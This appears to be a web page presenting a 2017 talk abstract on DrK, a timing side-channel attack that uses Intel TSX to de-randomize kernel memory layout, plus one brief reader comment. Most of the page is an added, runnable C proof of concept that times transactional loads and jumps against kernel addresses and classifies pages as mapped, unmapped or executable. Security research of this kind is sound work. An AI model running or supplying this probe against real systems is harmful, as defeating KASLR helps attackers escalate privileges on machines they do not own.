Breaking Kernel Address Space Layout Randomization (KASLR) with Intel TSX

by Yeongjin Jang, Sangho Lee, Taesoo Kim
Posted Sept. 15, 2017 by belen_caty

In this talk, we present a novel timing side-channel attack against KASLR, called DrK (De-randomizing Kernel address space), which can accurately, silently, and rapidly de-randomize the kernel memory layout by identifying page properties: unmapped, executable, or non-executable pages. DrK is built on a new hardware feature, Intel Transactional Synchronization Extensions (TSX). When an access inside a TSX transaction faults, for example a user-mode load from a kernel page, the CPU aborts the transaction and jumps to the user-supplied fallback handler without delivering the fault to the operating system, so the kernel never sees a page fault and never gets a chance to log or kill the probing process. In DrK, we turn this property into a timing channel: the abort latency depends on how far the hardware gets before the access fails, so a mapped kernel page (the privilege check fails after a TLB hit or a successful page-table walk) aborts faster than an unmapped one (the page-table walk itself fails), and an executable page aborts faster than a non-executable one when the transaction tries to fetch an instruction from it. Measuring these latencies across the privileged address space distinguishes the mapping status (mapped versus unmapped) and execution status (executable versus non-executable) of each page with high accuracy and precision. The DrK attack is applicable to any OS running on TSX-capable hardware, including guests in a virtualized environment, and it leaves no visible footprint, because the faulting accesses never reach the OS.
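The probe described above, as an added example written for this page and not the authors' code: one timed TSX transaction per access (a load for the mapped/unmapped test, a jump for the executable/non-executable test), the per-page minimum over many trials, and a two-class split of the resulting latencies. It assumes an x86-64 Linux host with RTM enabled; many CPUs now ship with TSX disabled in microcode, in which case `tsx_supported()` returns 0 and nothing is probed. The scanned base address `0xffffffff81000000`, the 16-page range and the 100-trial count are illustrative choices, and `probe`, `min_latency` and `split_classes` are names chosen here.

```c
/* Added example in the spirit of DrK; not the authors' code. Assumes x86-64
 * Linux with RTM enabled; elsewhere tsx_supported() is 0 and main() exits.
 * Base address, page count and trial count below are illustrative choices. */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__)
#include <cpuid.h>
#include <x86intrin.h>
#define HAVE_X86_64 1
#else
#define HAVE_X86_64 0
#endif

#define NO_ABORT 0xffffffffu /* sentinel: XBEGIN leaves EAX untouched on commit */

/* 1 if CPUID.(EAX=7,ECX=0):EBX.RTM[bit 11] is set, else 0. */
int tsx_supported(void) {
#if HAVE_X86_64
    unsigned int eax = 0, ebx = 0, ecx = 0, edx = 0;
    if (__get_cpuid_max(0, NULL) < 7) return 0;
    __cpuid_count(7, 0, eax, ebx, ecx, edx);
    return (int)((ebx >> 11) & 1u);
#else
    return 0;
#endif
}

/* Time one transactional access to addr: exec=0 loads from it, exec=1 jumps
 * to it. Returns TSC ticks from the access to the abort handler, or 0 if the
 * transaction committed (the address was usable from user mode). A faulting
 * access aborts the transaction; no exception reaches the kernel. Pass only
 * kernel addresses with exec=1: a user-executable target would simply run. */
uint64_t probe(uintptr_t addr, int exec) {
#if HAVE_X86_64
    uint64_t t0, t1, scratch;
    unsigned int status;
    _mm_lfence();
    t0 = __rdtsc();
    if (exec)
        __asm__ volatile("mov $0xffffffff, %%eax\n\t"
                         "xbegin 1f\n\t" /* on abort: EAX = status, goto 1 */
                         "jmp *%[a]\n\t" /* instruction fetch from addr */
                         "1:\n\t"
                         "mov %%eax, %[st]\n\t"
                         : [st] "=r"(status) : [a] "r"(addr)
                         : "rax", "memory", "cc");
    else
        __asm__ volatile("mov $0xffffffff, %%eax\n\t"
                         "xbegin 1f\n\t"
                         "mov (%[a]), %[tmp]\n\t" /* data load from addr */
                         "xend\n\t"
                         "1:\n\t"
                         "mov %%eax, %[st]\n\t"
                         : [st] "=r"(status), [tmp] "=&r"(scratch)
                         : [a] "r"(addr) : "rax", "memory", "cc");
    t1 = __rdtsc();
    _mm_lfence();
    (void)scratch;
    return status == NO_ABORT ? 0 : t1 - t0;
#else
    (void)addr; (void)exec;
    return 0;
#endif
}

/* Minimum over n probe results, skipping 0 (committed). Interrupts and cache
 * misses only add latency, so the minimum is the stable per-page figure. */
uint64_t min_latency(const uint64_t *s, int n) {
    uint64_t m = 0;
    for (int i = 0; i < n; i++)
        if (s[i] != 0 && (m == 0 || s[i] < m)) m = s[i];
    return m;
}

/* Split per-page minimum latencies at the midpoint between the global min
 * and max: label 0 = fast, 1 = slow. DrK's observation: for the load probe
 * fast = mapped, slow = unmapped; for the jump probe fast = executable.
 * Assumes both classes occur in the scanned range. Returns the threshold. */
uint64_t split_classes(const uint64_t *lat, int n, int *label) {
    uint64_t lo = lat[0], hi = lat[0];
    for (int i = 1; i < n; i++) {
        if (lat[i] < lo) lo = lat[i];
        if (lat[i] > hi) hi = lat[i];
    }
    uint64_t thr = lo + (hi - lo) / 2;
    for (int i = 0; i < n; i++) label[i] = lat[i] > thr ? 1 : 0;
    return thr;
}

#define PAGES 16
#define TRIALS 100

int main(void) {
    if (!tsx_supported()) { puts("RTM not available; nothing probed"); return 0; }
    /* Assumed: default Linux x86-64 kernel text base; with KASLR the live
     * base lies above it, which is exactly what a wider scan would reveal. */
    uintptr_t base = 0xffffffff81000000ull;
    uint64_t lat[PAGES], samples[TRIALS];
    int label[PAGES];
    for (int p = 0; p < PAGES; p++) {
        for (int t = 0; t < TRIALS; t++) samples[t] = probe(base + (uintptr_t)p * 4096, 0);
        lat[p] = min_latency(samples, TRIALS);
    }
    uint64_t thr = split_classes(lat, PAGES, label);
    printf("threshold %llu ticks\n", (unsigned long long)thr);
    for (int p = 0; p < PAGES; p++)
        printf("%#lx min %4llu -> %s\n", (unsigned long)(base + (uintptr_t)p * 4096),
               (unsigned long long)lat[p], label[p] ? "unmapped" : "mapped");
    return 0;
}
```

The inline assembly is used instead of the `_xbegin()` intrinsic so no `-mrtm` flag is needed; the sentinel in EAX is how the fallback path tells a commit from an abort, since XBEGIN only writes EAX on abort. Repeating the scan with `exec=1` over the pages labelled mapped gives the executable versus non-executable split. The midpoint split is the simplest possible classifier; it is only sound when the scanned range contains pages of both kinds, so a range that is entirely mapped or entirely unmapped will be mislabelled and needs a threshold calibrated on known pages instead.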

Steven Ulm 8 months ago

I can't say that I totally agree with your approach towards KASLR, but it's still an interesting point of view...